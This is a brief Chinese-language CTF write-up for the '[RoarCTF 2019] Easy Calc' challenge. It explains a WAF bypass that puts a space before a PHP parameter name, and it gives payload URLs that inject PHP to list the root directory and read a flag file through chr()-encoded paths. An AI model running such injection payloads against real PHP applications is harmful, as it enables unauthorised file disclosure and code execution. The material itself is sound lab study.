前面几天因为做战队大佬出的题耽误了,今天开始继续
[RoarCTF 2019]Easy Calc
直接查看源码发现有一个calc.php文件,URL后面加/calc.php
直接就进去了
解法一:
那么在这里我们就可以传递num参数,这里有两个难点:一个是WAF只允许num传入数字,另一个是preg_match过滤了很多字符。
前一个我们可以在num前面加空格绕过,应用的是PHP的字符串解析特性,waf会将" num"和"num"识别为两个不同的变量,但是PHP在解析字符串的时候会将空格自动去掉。
所以最后的payload是http://node3.buuoj.cn:25815/calc.php?%20num=1;var_dump(scandir(chr(47)))
var_dump显示所有类型的结果,scandir扫描文件夹,scandir("/")是扫描目录下的所有文件夹。我们能够找到一个flagg文件。
http://node3.buuoj.cn:25815/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
读取flagg的内容。这道题目还可以用http走私来解,明天再看。
https://blog.csdn.net/a3320315/article/details/102937797
http走私的漏洞我没有复现成功,贴一个师傅的writeup在这里,可能跟版本也有关系